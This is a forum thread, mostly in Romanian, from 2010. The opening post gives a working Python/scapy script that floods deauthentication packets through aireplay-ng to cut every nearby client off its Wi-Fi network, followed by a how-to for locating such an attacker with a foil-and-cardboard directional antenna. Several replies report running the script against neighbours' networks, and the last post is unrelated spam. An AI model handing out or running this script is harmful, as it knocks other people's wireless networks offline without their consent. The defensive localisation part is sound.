begood Posted May 20, 2010 Report Posted May 20, 2010 How to burn down any wireless network around you and how to find out the exact location of a wireless laptopI made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router.#!/usr/bin/pythontry: import sys,os from scapy.all import *except: print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed" sys.exit(0)def deauth_flood(p): if p.haslayer(Dot11): mac = {} mac["ap"]=p.sprintf("%Dot11.addr1%") mac["station1"]=p.sprintf("%Dot11.addr2%") if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None": os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate.def instructions(): print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n" print "python "+sys.argv[0]+" [iface]" print "python "+sys.argv[0]+" mon0"if len(sys.argv)>1: print "[+] Searching for packets..." sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood))else: sys.exit(instructions())Use at your own risk, you won’t be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company’s they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what when you are being targeted by this attack? First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about:- Attacker is at 1 location not too far away; for example in a car- Moving attacker walking around with a laptop in bag- Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case- Malicious pineapples- Phones (like the iphone)- Satellite dish pointed to you- Infected satellite Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable. Requirements:- Movable Linux based PC with wireless capability; if you don’t have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can’t boot DVD’s you can go for an Ubuntu live CD or another distribution, booting from these CD’s won’t change anything to your actual system.- Wireshark (free)- Aircrack-ng (free)optional:- poitable antenna- thin foil- scissors- glue- cardboard (or other hard bendable material) Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker.You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna. When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng.In wireshark apply “radiotap.length==13? as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng.Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here.Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you.Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng.Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough).Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine.cat `locate manuf` | grep 00:11:22Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need.Please note that this MAC address can be spoofed and/or not broadcasting so you won’t be able to see it, then you have to do it all with Wireshark and determine where the most packets come from.After you did all this you can just grab that malicious pineapple and smash it as hard as you can. This cheap attack vector can form a high risk level during war, when properly exploited an army can attack an entire city by pointing a satellite dish in their direction or think about an attacker which takes over a satellite and reprograms it to be able to do these kind of attacks, with these techniques it will be hard to prevent those attacks unless we will make big thin foil shields around our city’s.I gave you some basic solutions to find the attacker but this antenna detection way works great also for other means, i once tried this on a friend of mine in my old school to find out his location, it was a multi floor school building and i had no idea where he was, within 15 minutes i found him.//care-l testeaza ? How to burn down any wireless network around you and how to find out the exact location of a wireless laptop 3 Quote
Fitty Posted May 21, 2010 Report Posted May 21, 2010 Am vreo 10 wifiuri aici, stai sa vin de la scoala Quote
begood Posted May 21, 2010 Author Report Posted May 21, 2010 Am vreo 10 wifiuri aici, stai sa vin de la scoala can't wait eu n-am acum acces nici timp pentru asta Quote
Guest Nemessis Posted May 21, 2010 Report Posted May 21, 2010 Sa nu uiti sa ne zici daca ti-a iesit Fitty. Quote
adonisslanic Posted May 23, 2010 Report Posted May 23, 2010 Si eu ma apuc sa imi dobor wi-fi-ul din pod (serios) Quote
adonisslanic Posted May 23, 2010 Report Posted May 23, 2010 Dap, merge, am aflat ca e in pod si a aflat exact locatia... e plictisitor la inceput ca tre sa stai si sa compari numarul de pachete, dar cu cat te apropii, cu atat e mai kewl rep+ begood <()> Quote
Fitty Posted May 23, 2010 Report Posted May 23, 2010 A incercat un coleg si cica nimic. Canta trilulilu la vecinu-so de rupea... Deci s-a putut conecta fara probleme Quote
adonisslanic Posted May 25, 2010 Report Posted May 25, 2010 Poate ca nu merge pe unele wi-fi-uri, eu am incercat sa gasesc propriul meu router din pod si a mers... am cautat facand diferente intre numarul de pachete receptionate... Quote
pyth0n3 Posted May 25, 2010 Report Posted May 25, 2010 Pai normal ca trebuie sa mearga pt ca vine efectuat un attack de tipul Deauthentication care practic arunca afara pe oricine e colegat , in acest script atacul se repeta , un fel de flood Vine trimis un frame la adresa de broadcast care anuleaza pe oricine e conectat , Face in asa fel incat userii cred ca vin scosi afara de catre AP de retea .Ar mai fi essid_jack la care trebuie specificat adressa BSSID si canalul retelei De default trimite un pachetul la adresa de broadcast (avantajul e ca ii va scoate pe toti )Folosind optiunea -d se poate specifica un MAC anume essid_jack face parte din Airjack si se gaseste Aici Este un attack de tipul DOS Quote
zYztem Posted June 18, 2010 Report Posted June 18, 2010 Am incercat si eu mai inainte cu succes. Am reusit sa dobor 3 dintro lovitura Vecinu de sus asculta radio pe net dintruna sa facut liniste Quote
interes91ant Posted June 20, 2010 Report Posted June 20, 2010 am testat si eu si merge treaba. pax cu ce pret le vinzi si ce specificatii au? Quote
khushi11 Posted October 12, 2018 Report Posted October 12, 2018 This error is occur when some of the function is not connected or not enable but you can now learn how to turn on bluetooth on windows 10 from here. I am sure it will be helpful for you. Quote